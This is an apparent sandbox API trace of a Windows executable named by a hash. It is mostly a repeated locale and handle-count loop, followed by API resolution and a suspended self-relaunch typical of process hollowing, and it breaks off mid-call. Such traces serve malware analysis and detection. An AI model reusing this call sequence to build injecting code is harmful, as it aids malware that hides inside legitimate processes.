[0100.613] GetSystemDefaultLangID () returned 0x26a0409 [0100.613] GetThreadLocale () returned 0x409 [0100.613] GetCurrentProcess () returned 0xffffffff [0100.613] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.613] GetSystemDefaultLangID () returned 0x26a0409 [0100.613] GetThreadLocale () returned 0x409 [0100.613] GetCurrentProcess () returned 0xffffffff [0100.613] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.613] GetSystemDefaultLangID () returned 0x26a0409 [0100.613] GetThreadLocale () returned 0x409 [0100.613] GetCurrentProcess () returned 0xffffffff [0100.613] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.613] GetSystemDefaultLangID () returned 0x26a0409 [0100.613] GetThreadLocale () returned 0x409 [0100.613] GetCurrentProcess () returned 0xffffffff [0100.613] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.613] GetSystemDefaultLangID () returned 0x26a0409 [0100.613] GetThreadLocale () returned 0x409 [0100.613] GetCurrentProcess () returned 0xffffffff [0100.613] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.613] GetSystemDefaultLangID () returned 0x26a0409 [0100.614] GetThreadLocale () returned 0x409 [0100.614] GetCurrentProcess () returned 0xffffffff [0100.614] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.614] GetSystemDefaultLangID () returned 0x26a0409 [0100.614] GetThreadLocale () returned 0x409 [0100.614] GetCurrentProcess () returned 0xffffffff [0100.614] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.614] GetSystemDefaultLangID () returned 0x26a0409 [0100.614] GetThreadLocale () returned 0x409 [0100.614] GetCurrentProcess () returned 0xffffffff [0100.614] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.614] GetSystemDefaultLangID () returned 0x26a0409 [0100.614] GetThreadLocale () returned 0x409 [0100.614] GetCurrentProcess () returned 0xffffffff [0100.614] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.614] GetSystemDefaultLangID () returned 0x26a0409 [0100.614] GetThreadLocale () returned 0x409 [0100.614] GetCurrentProcess () returned 0xffffffff [0100.614] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.614] GetSystemDefaultLangID () returned 0x26a0409 [0100.614] GetThreadLocale () returned 0x409 [0100.614] GetCurrentProcess () returned 0xffffffff [0100.614] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.614] GetSystemDefaultLangID () returned 0x26a0409 [0100.614] GetThreadLocale () returned 0x409 [0100.614] GetCurrentProcess () returned 0xffffffff [0100.615] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.615] GetSystemDefaultLangID () returned 0x26a0409 [0100.615] GetThreadLocale () returned 0x409 [0100.615] GetCurrentProcess () returned 0xffffffff [0100.615] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.615] GetSystemDefaultLangID () returned 0x26a0409 [0100.615] GetThreadLocale () returned 0x409 [0100.615] GetCurrentProcess () returned 0xffffffff [0100.615] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.615] GetSystemDefaultLangID () returned 0x26a0409 [0100.615] GetThreadLocale () returned 0x409 [0100.615] GetCurrentProcess () returned 0xffffffff [0100.615] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.615] GetSystemDefaultLangID () returned 0x26a0409 [0100.615] GetThreadLocale () returned 0x409 [0100.615] GetCurrentProcess () returned 0xffffffff [0100.615] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.615] GetSystemDefaultLangID () returned 0x26a0409 [0100.615] GetThreadLocale () returned 0x409 [0100.615] GetCurrentProcess () returned 0xffffffff [0100.615] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.615] GetSystemDefaultLangID () returned 0x26a0409 [0100.615] GetThreadLocale () returned 0x409 [0100.615] GetCurrentProcess () returned 0xffffffff [0100.615] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.616] GetSystemDefaultLangID () returned 0x26a0409 [0100.616] GetThreadLocale () returned 0x409 [0100.616] GetCurrentProcess () returned 0xffffffff [0100.616] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.616] GetSystemDefaultLangID () returned 0x26a0409 [0100.616] GetThreadLocale () returned 0x409 [0100.616] GetCurrentProcess () returned 0xffffffff [0100.616] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.616] GetSystemDefaultLangID () returned 0x26a0409 [0100.616] GetThreadLocale () returned 0x409 [0100.616] GetCurrentProcess () returned 0xffffffff [0100.616] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.616] GetSystemDefaultLangID () returned 0x26a0409 [0100.616] GetThreadLocale () returned 0x409 [0100.616] GetCurrentProcess () returned 0xffffffff [0100.616] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.616] GetSystemDefaultLangID () returned 0x26a0409 [0100.616] GetThreadLocale () returned 0x409 [0100.616] GetCurrentProcess () returned 0xffffffff [0100.616] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.616] GetSystemDefaultLangID () returned 0x26a0409 [0100.616] GetThreadLocale () returned 0x409 [0100.616] GetCurrentProcess () returned 0xffffffff [0100.616] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.616] GetSystemDefaultLangID () returned 0x26a0409 [0100.617] GetThreadLocale () returned 0x409 [0100.617] GetCurrentProcess () returned 0xffffffff [0100.617] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.617] GetSystemDefaultLangID () returned 0x26a0409 [0100.617] GetThreadLocale () returned 0x409 [0100.617] GetCurrentProcess () returned 0xffffffff [0100.617] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.617] GetSystemDefaultLangID () returned 0x26a0409 [0100.617] GetThreadLocale () returned 0x409 [0100.617] GetCurrentProcess () returned 0xffffffff [0100.617] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.617] GetSystemDefaultLangID () returned 0x26a0409 [0100.617] GetThreadLocale () returned 0x409 [0100.617] GetCurrentProcess () returned 0xffffffff [0100.617] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.617] GetSystemDefaultLangID () returned 0x26a0409 [0100.617] GetThreadLocale () returned 0x409 [0100.617] GetCurrentProcess () returned 0xffffffff [0100.617] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.617] GetSystemDefaultLangID () returned 0x26a0409 [0100.617] GetThreadLocale () returned 0x409 [0100.617] GetCurrentProcess () returned 0xffffffff [0100.617] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.617] GetSystemDefaultLangID () returned 0x26a0409 [0100.617] GetThreadLocale () returned 0x409 [0100.617] GetCurrentProcess () returned 0xffffffff [0100.617] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.618] GetSystemDefaultLangID () returned 0x26a0409 [0100.618] GetThreadLocale () returned 0x409 [0100.618] GetCurrentProcess () returned 0xffffffff [0100.618] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.618] GetSystemDefaultLangID () returned 0x26a0409 [0100.618] GetThreadLocale () returned 0x409 [0100.618] GetCurrentProcess () returned 0xffffffff [0100.618] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.618] GetSystemDefaultLangID () returned 0x26a0409 [0100.618] GetThreadLocale () returned 0x409 [0100.618] GetCurrentProcess () returned 0xffffffff [0100.618] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.618] GetSystemDefaultLangID () returned 0x26a0409 [0100.618] GetThreadLocale () returned 0x409 [0100.618] GetCurrentProcess () returned 0xffffffff [0100.618] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.618] GetSystemDefaultLangID () returned 0x26a0409 [0100.618] GetThreadLocale () returned 0x409 [0100.618] GetCurrentProcess () returned 0xffffffff [0100.618] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.618] GetSystemDefaultLangID () returned 0x26a0409 [0100.618] GetThreadLocale () returned 0x409 [0100.618] GetCurrentProcess () returned 0xffffffff [0100.618] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.618] GetSystemDefaultLangID () returned 0x26a0409 [0100.618] GetThreadLocale () returned 0x409 [0100.618] GetCurrentProcess () returned 0xffffffff [0100.619] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.619] GetSystemDefaultLangID () returned 0x26a0409 [0100.619] GetThreadLocale () returned 0x409 [0100.619] GetCurrentProcess () returned 0xffffffff [0100.619] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.619] GetSystemDefaultLangID () returned 0x26a0409 [0100.619] GetThreadLocale () returned 0x409 [0100.619] GetCurrentProcess () returned 0xffffffff [0100.619] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.619] GetSystemDefaultLangID () returned 0x26a0409 [0100.619] GetThreadLocale () returned 0x409 [0100.619] GetCurrentProcess () returned 0xffffffff [0100.619] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.619] GetSystemDefaultLangID () returned 0x26a0409 [0100.619] GetThreadLocale () returned 0x409 [0100.619] GetCurrentProcess () returned 0xffffffff [0100.619] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.619] GetSystemDefaultLangID () returned 0x26a0409 [0100.619] GetThreadLocale () returned 0x409 [0100.619] GetCurrentProcess () returned 0xffffffff [0100.619] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.619] GetSystemDefaultLangID () returned 0x26a0409 [0100.619] GetThreadLocale () returned 0x409 [0100.619] GetCurrentProcess () returned 0xffffffff [0100.619] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.619] GetSystemDefaultLangID () returned 0x26a0409 [0100.619] GetThreadLocale () returned 0x409 [0100.620] GetCurrentProcess () returned 0xffffffff [0100.620] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.620] GetSystemDefaultLangID () returned 0x26a0409 [0100.620] GetThreadLocale () returned 0x409 [0100.620] GetCurrentProcess () returned 0xffffffff [0100.620] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.620] GetSystemDefaultLangID () returned 0x26a0409 [0100.620] GetThreadLocale () returned 0x409 [0100.620] GetCurrentProcess () returned 0xffffffff [0100.620] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.620] GetSystemDefaultLangID () returned 0x26a0409 [0100.620] GetThreadLocale () returned 0x409 [0100.620] GetCurrentProcess () returned 0xffffffff [0100.620] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.620] GetSystemDefaultLangID () returned 0x26a0409 [0100.620] GetThreadLocale () returned 0x409 [0100.620] GetCurrentProcess () returned 0xffffffff [0100.620] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.620] GetSystemDefaultLangID () returned 0x26a0409 [0100.620] GetThreadLocale () returned 0x409 [0100.620] GetCurrentProcess () returned 0xffffffff [0100.620] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.620] GetSystemDefaultLangID () returned 0x26a0409 [0100.620] GetThreadLocale () returned 0x409 [0100.620] GetCurrentProcess () returned 0xffffffff [0100.620] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.621] GetSystemDefaultLangID () returned 0x26a0409 [0100.621] GetThreadLocale () returned 0x409 [0100.621] GetCurrentProcess () returned 0xffffffff [0100.621] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.621] GetSystemDefaultLangID () returned 0x26a0409 [0100.621] GetThreadLocale () returned 0x409 [0100.621] GetCurrentProcess () returned 0xffffffff [0100.621] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.621] GetSystemDefaultLangID () returned 0x26a0409 [0100.621] GetThreadLocale () returned 0x409 [0100.621] GetCurrentProcess () returned 0xffffffff [0100.621] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.621] GetSystemDefaultLangID () returned 0x26a0409 [0100.621] GetThreadLocale () returned 0x409 [0100.621] GetCurrentProcess () returned 0xffffffff [0100.621] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.621] GetSystemDefaultLangID () returned 0x26a0409 [0100.621] GetThreadLocale () returned 0x409 [0100.621] GetCurrentProcess () returned 0xffffffff [0100.621] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.621] GetSystemDefaultLangID () returned 0x26a0409 [0100.621] GetThreadLocale () returned 0x409 [0100.621] GetCurrentProcess () returned 0xffffffff [0100.621] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.621] GetSystemDefaultLangID () returned 0x26a0409 [0100.622] GetThreadLocale () returned 0x409 [0100.622] GetCurrentProcess () returned 0xffffffff [0100.622] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.622] GetSystemDefaultLangID () returned 0x26a0409 [0100.622] GetThreadLocale () returned 0x409 [0100.622] GetCurrentProcess () returned 0xffffffff [0100.622] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.622] GetSystemDefaultLangID () returned 0x26a0409 [0100.622] GetThreadLocale () returned 0x409 [0100.622] GetCurrentProcess () returned 0xffffffff [0100.622] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.622] GetSystemDefaultLangID () returned 0x26a0409 [0100.622] GetThreadLocale () returned 0x409 [0100.622] GetCurrentProcess () returned 0xffffffff [0100.622] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.622] GetSystemDefaultLangID () returned 0x26a0409 [0100.622] GetThreadLocale () returned 0x409 [0100.622] GetCurrentProcess () returned 0xffffffff [0100.622] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.622] GetSystemDefaultLangID () returned 0x26a0409 [0100.622] GetThreadLocale () returned 0x409 [0100.622] GetCurrentProcess () returned 0xffffffff [0100.622] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.622] GetSystemDefaultLangID () returned 0x26a0409 [0100.623] GetThreadLocale () returned 0x409 [0100.623] GetCurrentProcess () returned 0xffffffff [0100.623] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.623] GetSystemDefaultLangID () returned 0x26a0409 [0100.623] GetThreadLocale () returned 0x409 [0100.623] GetCurrentProcess () returned 0xffffffff [0100.623] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.623] GetSystemDefaultLangID () returned 0x26a0409 [0100.623] GetThreadLocale () returned 0x409 [0100.623] GetCurrentProcess () returned 0xffffffff [0100.623] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.623] GetSystemDefaultLangID () returned 0x26a0409 [0100.623] GetThreadLocale () returned 0x409 [0101.358] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x752b0000 [0101.358] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualProtect") returned 0x752c4317 [0101.358] VirtualProtect (in: lpAddress=0x2540020, dwSize=0x91100, flNewProtect=0x40, lpflOldProtect=0x18e818 | out: lpflOldProtect=0x18e818*=0x4) returned 1 [0101.469] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x752b0000 [0101.469] GetProcAddress (hModule=0x752b0000, lpProcName="GlobalAlloc") returned 0x752c5846 [0101.469] GetProcAddress (hModule=0x752b0000, lpProcName="GetLastError") returned 0x752c11c0 [0101.469] GetProcAddress (hModule=0x752b0000, lpProcName="Sleep") returned 0x752c10ff [0101.470] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualAlloc") returned 0x752c1836 [0101.470] GetProcAddress (hModule=0x752b0000, lpProcName="CreateToolhelp32Snapshot") returned 0x752e7327 [0101.470] GetProcAddress (hModule=0x752b0000, lpProcName="Module32First") returned 0x75346279 [0101.470] GetProcAddress (hModule=0x752b0000, lpProcName="CloseHandle") returned 0x752c13f0 [0101.470] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x5c [0101.473] Module32First (hSnapshot=0x5c, lpme=0x18e5a4) returned 1 [0101.476] VirtualAlloc (lpAddress=0x0, dwSize=0x11a5a0, flAllocationType=0x1000, flProtect=0x40) returned 0x3eb0000 [0101.524] LoadLibraryA (lpLibFileName="user32") returned 0x76860000 [0101.524] GetProcAddress (hModule=0x76860000, lpProcName="MessageBoxA") returned 0x768cfd1e [0101.524] GetProcAddress (hModule=0x76860000, lpProcName="GetMessageExtraInfo") returned 0x7689ed76 [0101.524] LoadLibraryA (lpLibFileName="kernel32") returned 0x752b0000 [0101.524] GetProcAddress (hModule=0x752b0000, lpProcName="WinExec") returned 0x75343051 [0101.524] GetProcAddress (hModule=0x752b0000, lpProcName="CreateFileA") returned 0x752c537e [0101.525] GetProcAddress (hModule=0x752b0000, lpProcName="WriteFile") returned 0x752c1282 [0101.525] GetProcAddress (hModule=0x752b0000, lpProcName="CloseHandle") returned 0x752c13f0 [0101.525] GetProcAddress (hModule=0x752b0000, lpProcName="CreateProcessA") returned 0x752c1072 [0101.525] GetProcAddress (hModule=0x752b0000, lpProcName="GetThreadContext") returned 0x752e799c [0101.525] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualAlloc") returned 0x752c1836 [0101.525] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualAllocEx") returned 0x752dd980 [0101.525] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualFree") returned 0x752c184e [0101.525] GetProcAddress (hModule=0x752b0000, lpProcName="ReadProcessMemory") returned 0x752dcfa4 [0101.525] GetProcAddress (hModule=0x752b0000, lpProcName="WriteProcessMemory") returned 0x752dd9b0 [0101.526] GetProcAddress (hModule=0x752b0000, lpProcName="SetThreadContext") returned 0x75345933 [0101.526] GetProcAddress (hModule=0x752b0000, lpProcName="ResumeThread") returned 0x752c43a7 [0101.526] GetProcAddress (hModule=0x752b0000, lpProcName="WaitForSingleObject") returned 0x752c1136 [0101.526] GetProcAddress (hModule=0x752b0000, lpProcName="GetModuleFileNameA") returned 0x752c1491 [0101.526] GetProcAddress (hModule=0x752b0000, lpProcName="GetCommandLineA") returned 0x752c5159 [0101.526] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76f00000 [0101.531] GetProcAddress (hModule=0x76f00000, lpProcName="NtUnmapViewOfSection") returned 0x76f1fc70 [0101.532] GetProcAddress (hModule=0x76f00000, lpProcName="NtWriteVirtualMemory") returned 0x76f1fe04 [0101.532] GetProcAddress (hModule=0x76860000, lpProcName="RegisterClassExA") returned 0x7687db98 [0101.533] GetProcAddress (hModule=0x76860000, lpProcName="CreateWindowExA") returned 0x7687d22e [0101.533] GetProcAddress (hModule=0x76860000, lpProcName="PostMessageA") returned 0x76883baa [0101.533] GetProcAddress (hModule=0x76860000, lpProcName="GetMessageA") returned 0x76877bd3 [0101.533] GetProcAddress (hModule=0x76860000, lpProcName="DefWindowProcA") returned 0x76f424e0 [0101.533] GetProcAddress (hModule=0x752b0000, lpProcName="GetFileAttributesA") returned 0x752c53cc [0101.533] GetProcAddress (hModule=0x752b0000, lpProcName="GetStartupInfoA") returned 0x752c0e00 [0101.533] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualProtectEx") returned 0x75344b5f [0101.533] GetProcAddress (hModule=0x752b0000, lpProcName="ExitProcess") returned 0x752c79c8 [0101.533] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0101.534] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0101.534] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0101.534] RegisterClassExA (param_1=0x18e260) returned 0x25c1c9 [0101.534] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x90182 [0101.545] PostMessageA (hWnd=0x90182, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0101.545] GetMessageA (in: lpMsg=0x18e290, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e290) returned 1 [0101.546] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0101.546] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x210000, nSize=0x2800 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe")) returned 0x5f [0101.546] GetStartupInfoA (in: lpStartupInfo=0x18e1b4 | out: lpStartupInfo=0x18e1b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0101.546] GetCommandLineA () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --Admin IsNotAutoStart IsNotTask" [0101.546] CreateProcessA (in: lpApplicationName="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe", lpCommandLine="\"C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --Admin IsNotAutoStart IsNotTask", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e1b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff), lpProcessInformation=0x18e20c | out: lpCommandLine="\"C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --Admin IsNotAutoStart IsNotTask", lpProcessInformation=0x18e20c*(hProcess=0x78, hThread=0x74, dwProcessId=0xee4, dwThreadId=0xee8)) returned 1 [0101.555] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.556] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0101.556] GetThreadContext (in: hThread=0x74, lpContext=0x210000 | out: lpContext=0x210000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x4984b0, Ebp=0x0, Eip=0x76f101c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, 